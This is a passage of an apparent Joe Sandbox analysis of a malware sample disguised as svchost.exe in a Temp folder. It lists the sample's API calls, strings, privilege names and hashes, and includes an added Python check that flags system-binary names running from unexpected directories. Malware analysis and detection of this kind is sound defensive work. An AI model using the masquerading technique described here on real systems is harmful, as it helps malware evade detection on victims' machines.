                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CompareString
                                                            • String ID:
                                                            • API String ID: 3397213944-0
                                                            • Opcode ID: 3c6a086f0d66fdb6020272a604ccc63ef10a33e4896587692a7b77b8394f4933
                                                            • Instruction ID: 19aa2b800a1447101871918d4456a9a01139b8a400051a3692e5bc5e0d0b9019
                                                            • Opcode Fuzzy Hash: 3c6a086f0d66fdb6020272a604ccc63ef10a33e4896587692a7b77b8394f4933
                                                            • Instruction Fuzzy Hash: 76F06D32408018BBCF225F94EC0AD8A7F66FB407B1B118005FA1A9B061CB729A65D691
                                                            APIs
                                                            • _free.LIBCMT ref: 0085891E
                                                              • Part of subcall function 00858DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0085C896,00863A34,00000000,00863A34,00000000,?,0085C8BD,00863A34,00000007,00863A34,?,0085CCBA,00863A34), ref: 00858DE2
                                                              • Part of subcall function 00858DCC: GetLastError.KERNEL32(00863A34,?,0085C896,00863A34,00000000,00863A34,00000000,?,0085C8BD,00863A34,00000007,00863A34,?,0085CCBA,00863A34,00863A34), ref: 00858DF4
                                                            • _free.LIBCMT ref: 00858930
                                                            • _free.LIBCMT ref: 00858943
                                                            • _free.LIBCMT ref: 00858954
                                                            • _free.LIBCMT ref: 00858965
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 992bca7f948063cb9fc29790c1b1014987f752a6570d11e86ca4f797c1338361
                                                            • Instruction ID: bea24e51abc541926734500e2fc091002825da9a0c13231e0fbb9b5b6bf51729
                                                            • Opcode Fuzzy Hash: 992bca7f948063cb9fc29790c1b1014987f752a6570d11e86ca4f797c1338361
                                                            • Instruction Fuzzy Hash: 2FF05E75815126EBCB067F58FC024057FF1F7247113091607F914E36B1DB724949DB82
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _swprintf
                                                            • String ID: %ls$%s: %s
                                                            • API String ID: 589789837-2259941744
                                                            • Opcode ID: cc493c60d84cfa6b1277be50d398bef133e4c1aea2dfb900a959ecd929b21eb2
                                                            • Instruction ID: b5eba07b52d24910cad73b8f11072a799211b317d38ee467f2901fe0d468b480
                                                            • Opcode Fuzzy Hash: cc493c60d84cfa6b1277be50d398bef133e4c1aea2dfb900a959ecd929b21eb2
                                                            • Instruction Fuzzy Hash: 7B513D3138830CF6EE211A948D4FF35B266FB25B0CF144516F396E48E1DAA2E4D0A71B
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\svchost.exe,00000104), ref: 00857FAE
                                                            • _free.LIBCMT ref: 00858079
                                                            • _free.LIBCMT ref: 00858083
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _free$FileModuleName
                                                            • String ID: C:\Users\user\AppData\Local\Temp\svchost.exe
                                                            • API String ID: 2506810119-58718599
                                                            • Opcode ID: aa2617710de3ab00bb77d603857cb9734dc13093ef9ebb6a75ebeb6a7e0acf4e
                                                            • Instruction ID: 26a051704e73f77504257a722b84314d1210f9ecec8ff4d5dd97cd1f60452359
                                                            • Opcode Fuzzy Hash: aa2617710de3ab00bb77d603857cb9734dc13093ef9ebb6a75ebeb6a7e0acf4e
                                                            • Instruction Fuzzy Hash: 0A31AF71A04618EFCB21EF999C8599EBBFCFB94312F144167ED04E7250DA708A48CB91
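The function above calls GetModuleFileNameA and gets back C:\Users\user\AppData\Local\Temp\svchost.exe: the dropped stage carries the name of a core Windows service host but runs from the user's Temp directory. The check a responder wants for that pattern is a location test on process image paths, shown here as an added example (not Joe Sandbox output and not code from the sample). The allow-list of expected directories and the process list are constructed for the example; only the first path is taken from the report. Relative components are collapsed before comparison so a path such as C:\Windows\System32\..\Temp\svchost.exe is not mistaken for the System32 copy.

```python
import ntpath
from typing import Dict, List, Tuple

# Directories in which each watched Windows binary legitimately runs
# (lower-case, no trailing separator).  Constructed allow-list for this
# example; extend it per host build before using it in detection.
EXPECTED_DIRS: Dict[str, Tuple[str, ...]] = {
    "svchost.exe":  (r"c:\windows\system32", r"c:\windows\syswow64"),
    "lsass.exe":    (r"c:\windows\system32",),
    "csrss.exe":    (r"c:\windows\system32",),
    "winlogon.exe": (r"c:\windows\system32",),
    "explorer.exe": (r"c:\windows",),
}


def normalize(path: str) -> str:
    """Lower-case the path, unify separators and collapse '.'/'..' components,
    so C:\\Windows\\System32\\..\\Temp\\x.exe compares as C:\\Windows\\Temp\\x.exe."""
    return ntpath.normpath(path.strip().replace("/", "\\")).lower()


def is_masquerading(image_path: str) -> bool:
    """True when the file name is a watched system-binary name but the
    directory is not one where that binary is expected to live."""
    directory, name = ntpath.split(normalize(image_path))
    expected = EXPECTED_DIRS.get(name)
    if expected is None:
        return False  # not a name on the watch-list; no verdict
    return directory not in expected


def find_anomalies(processes: List[Tuple[int, str]]) -> List[Tuple[int, str]]:
    """Return the (pid, image_path) pairs that fail the location check."""
    return [(pid, path) for pid, path in processes if is_masquerading(path)]


# Constructed process list.  Only the first path comes from the report
# (the string GetModuleFileNameA returned); the rest are illustrative.
SAMPLE_PROCESSES: List[Tuple[int, str]] = [
    (2,    r"C:\Users\user\AppData\Local\Temp\svchost.exe"),
    (900,  r"C:\Windows\System32\svchost.exe"),
    (1000, r"C:\Windows\SysWOW64\svchost.exe"),
    (1300, r"C:\Windows\System32\..\Temp\svchost.exe"),
    (4000, r"C:\Program Files\app\app.exe"),
    (5000, r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for pid, path in find_anomalies(SAMPLE_PROCESSES):
        print(f"pid {pid}: system-binary name outside its expected directory: {path}")
```

Run against the constructed list, the check flags pid 2 (the report's Temp copy) and pid 1300 (the traversal path), and leaves the System32, SysWOW64 and Program Files entries alone. Matching on the normalized directory rather than on a substring of the path avoids the classic miss where an attacker uses a directory that merely contains "system32" somewhere in its name.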
                                                            APIs
                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 008531FB
                                                            • _abort.LIBCMT ref: 00853306
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: EncodePointer_abort
                                                            • String ID: MOC$RCC
                                                            • API String ID: 948111806-2084237596
                                                            • Opcode ID: 623e815916e4175b59a72d361f185bc69812825ac6189226b098182746cb965f
                                                            • Instruction ID: 45450f9d92a1b1ea29a0c4eff3aa796588f6f93d3d5dbdb343552df94533da35
                                                            • Opcode Fuzzy Hash: 623e815916e4175b59a72d361f185bc69812825ac6189226b098182746cb965f
                                                            • Instruction Fuzzy Hash: 17414772900209AFCF16DF98CD81AEEBBB5FF48346F188059FD08A7221D735AA54DB51
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00837406
                                                              • Part of subcall function 00833BBA: __EH_prolog.LIBCMT ref: 00833BBF
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 008374CD
                                                              • Part of subcall function 00837A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00837AAB
                                                              • Part of subcall function 00837A9C: GetLastError.KERNEL32 ref: 00837AF1
                                                              • Part of subcall function 00837A9C: CloseHandle.KERNEL32(?), ref: 00837B00
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                            • API String ID: 3813983858-639343689
                                                            • Opcode ID: 34329a9955fd71347a6a0f6db236e57366629594c6d6acf5776e1ecfb97ac136
                                                            • Instruction ID: 94f7ea7c67eea994bb84f5d7e60b501677f4131ed551e65c1b21e3e308779a4a
                                                            • Opcode Fuzzy Hash: 34329a9955fd71347a6a0f6db236e57366629594c6d6acf5776e1ecfb97ac136
                                                            • Instruction Fuzzy Hash: 7B31B4B1D04258AADF21EBA8CC49BEE7BB9FF85304F044015F545E7282DB74DA84C7A2
                                                            APIs
                                                              • Part of subcall function 00831316: GetDlgItem.USER32(00000000,00003021), ref: 0083135A
                                                              • Part of subcall function 00831316: SetWindowTextW.USER32(00000000,008635F4), ref: 00831370
                                                            • EndDialog.USER32(?,00000001), ref: 0084AD98
                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0084ADAD
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 0084ADC2
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: ASKNEXTVOL
                                                            • API String ID: 445417207-3402441367
                                                            • Opcode ID: fc02abab7abb328ff46066c8d8f9031f7d645b4b4f734cef826a9a6ce9767279
                                                            • Instruction ID: d47c4fb85d4feeb188030078d15751b1797ab694ca53457b4336fda13deb74f3
                                                            • Opcode Fuzzy Hash: fc02abab7abb328ff46066c8d8f9031f7d645b4b4f734cef826a9a6ce9767279
                                                            • Instruction Fuzzy Hash: B011B132AC4208BFDB15AF689C09FAA7B69FB9A746F040411F241EE5A0C7629905D763
                                                            APIs
                                                            • __fprintf_l.LIBCMT ref: 0083D954
                                                            • _strncpy.LIBCMT ref: 0083D99A
                                                              • Part of subcall function 00841DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00871030,00000200,0083D928,00000000,?,00000050,00871030), ref: 00841DC4
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                            • String ID: $%s$@%s
                                                            • API String ID: 562999700-834177443
                                                            • Opcode ID: f26917d77976a935b2bee78a19536ba978f3599d963fdf536ae3b76fdd649b1b
                                                            • Instruction ID: 0970c369644030fdebd6ce8571457eeb0a05afe86d60904a84b61731156fcaee
                                                            • Opcode Fuzzy Hash: f26917d77976a935b2bee78a19536ba978f3599d963fdf536ae3b76fdd649b1b
                                                            • Instruction Fuzzy Hash: E0216F7244034CAEEB20DEA4DC05FDE7FE8FB45304F040511FD10D6292E675D6589B91
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0083AC5A,00000008,?,00000000,?,0083D22D,?,00000000), ref: 00840E85
                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0083AC5A,00000008,?,00000000,?,0083D22D,?,00000000), ref: 00840E8F
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0083AC5A,00000008,?,00000000,?,0083D22D,?,00000000), ref: 00840E9F
                                                            Strings
                                                            • Thread pool initialization failed., xrefs: 00840EB7
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                            • String ID: Thread pool initialization failed.
                                                            • API String ID: 3340455307-2182114853
                                                            • Opcode ID: ad695d57d08ab17b9daf791faa03fa91b289000f0fc6ccd84f50517b16ac0c63
                                                            • Instruction ID: dbcf688f26552d6f5f758b78cdd08389d7ecefb0681aea27115612a71f1ebc0d
                                                            • Opcode Fuzzy Hash: ad695d57d08ab17b9daf791faa03fa91b289000f0fc6ccd84f50517b16ac0c63
                                                            • Instruction Fuzzy Hash: 251191B1A0070DAFC3215F6A9C849A7FBECFB65744F104C2EF2DAC2201D6B5A9518B50
                                                            APIs
                                                              • Part of subcall function 00831316: GetDlgItem.USER32(00000000,00003021), ref: 0083135A
                                                              • Part of subcall function 00831316: SetWindowTextW.USER32(00000000,008635F4), ref: 00831370
                                                            • EndDialog.USER32(?,00000001), ref: 0084B2BE
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0084B2D6
                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 0084B304
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: GETPASSWORD1
                                                            • API String ID: 445417207-3292211884
                                                            • Opcode ID: aee5f56552565e30364ee7a9c09c06a244f86f106d33762d22884dafaf6eb5d7
                                                            • Instruction ID: 0fcbb5c1b8f4c8be20addb771163e980a8d8b04c8fae5bd662504260cf468442
                                                            • Opcode Fuzzy Hash: aee5f56552565e30364ee7a9c09c06a244f86f106d33762d22884dafaf6eb5d7
                                                            • Instruction Fuzzy Hash: E111E13290012CB6DB22AEA89C49FFF37BCFB59700F000021FA45F3184D7A4DA0597A1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                            • API String ID: 0-56093855
                                                            • Opcode ID: d2487808a3054bc6e5a97066941a43367fae89a527069c43a0f9f22b37cb8f33
                                                            • Instruction ID: 1c40b5721601abbeb762697f99f359ff95433d6da6f6dd972e98ed6228889a97
                                                            • Opcode Fuzzy Hash: d2487808a3054bc6e5a97066941a43367fae89a527069c43a0f9f22b37cb8f33
                                                            • Instruction Fuzzy Hash: 6F017C76A0435DEFDB619FA8FC4CA5A7BA9F709358B040426F909D3234D671D890DBA0
                                                            APIs
                                                            • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0084DBF4
                                                            • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0084DC30
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID: sfxcmd$sfxpar
                                                            • API String ID: 1431749950-3493335439
                                                            • Opcode ID: e2b7d9867f3e983d6eb235dde4642a543f0bcfaa031fb42c4b877055fb4a64a4
                                                            • Instruction ID: 4c0ffa3fded4e7ddcd2434ac519c38c64356103f08130edd84ed2016bca80c84
                                                            • Opcode Fuzzy Hash: e2b7d9867f3e983d6eb235dde4642a543f0bcfaa031fb42c4b877055fb4a64a4
                                                            • Instruction Fuzzy Hash: 86F0A0B240432CAACB212F988C46FAB7B98FF16B85B050411FE85D6251E6F48940DAA1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                            • Instruction ID: 765cd662a1a0d4b720e2204baf00407958d8e887cdb8569d597df667a1a3fc3a
                                                            • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                            • Instruction Fuzzy Hash: B7A1137290469ADFEB228F28C8917AEBBE5FF51311F1841ADE8C5DB281C6388D49C751
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00837F69,?,?,?), ref: 0083A3FA
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00837F69,?), ref: 0083A43E
                                                            • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00837F69,?,?,?,?,?,?,?), ref: 0083A4BF
                                                            • CloseHandle.KERNEL32(?,?,?,00000800,?,00837F69,?,?,?,?,?,?,?,?,?,?), ref: 0083A4C6
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: File$Create$CloseHandleTime
                                                            • String ID:
                                                            • API String ID: 2287278272-0
                                                            • Opcode ID: 80249dc564e5f1c4320ac6030d20c0118e20dcfca349133f8e48400857c0f57d
                                                            • Instruction ID: e6b928f44582f0f3545b5d05a728a87419e3fc9572a021e16943ac2f88b1a7de
                                                            • Opcode Fuzzy Hash: 80249dc564e5f1c4320ac6030d20c0118e20dcfca349133f8e48400857c0f57d
                                                            • Instruction Fuzzy Hash: 7941AE31248381AAD725DF28DC49FAEBBE8FBC5700F04091DF5D5D3290D6A49A489B93
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID:
                                                            • API String ID: 176396367-0
                                                            • Opcode ID: c678881c18fb8b88451c3bd928a63508d82c09aa4464a0e381e705552586268a
                                                            • Instruction ID: 1a2686e6d266fa0a70172e4c76e0cb0a54b31cec308f8bbd4f559b8ed98b130f
                                                            • Opcode Fuzzy Hash: c678881c18fb8b88451c3bd928a63508d82c09aa4464a0e381e705552586268a
                                                            • Instruction Fuzzy Hash: 1B41B4719006695BCB11EF688C4A9EF7BB8FF40751F04001AFD46E7245EF30AE498AE1
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,008591E0,?,00000000,?,00000001,?,?,00000001,008591E0,?), ref: 0085C9D5
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0085CA5E
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00856CBE,?), ref: 0085CA70
                                                            • __freea.LIBCMT ref: 0085CA79
                                                              • Part of subcall function 00858E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0085CA2C,00000000,?,00856CBE,?,00000008,?,008591E0,?,?,?), ref: 00858E38
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
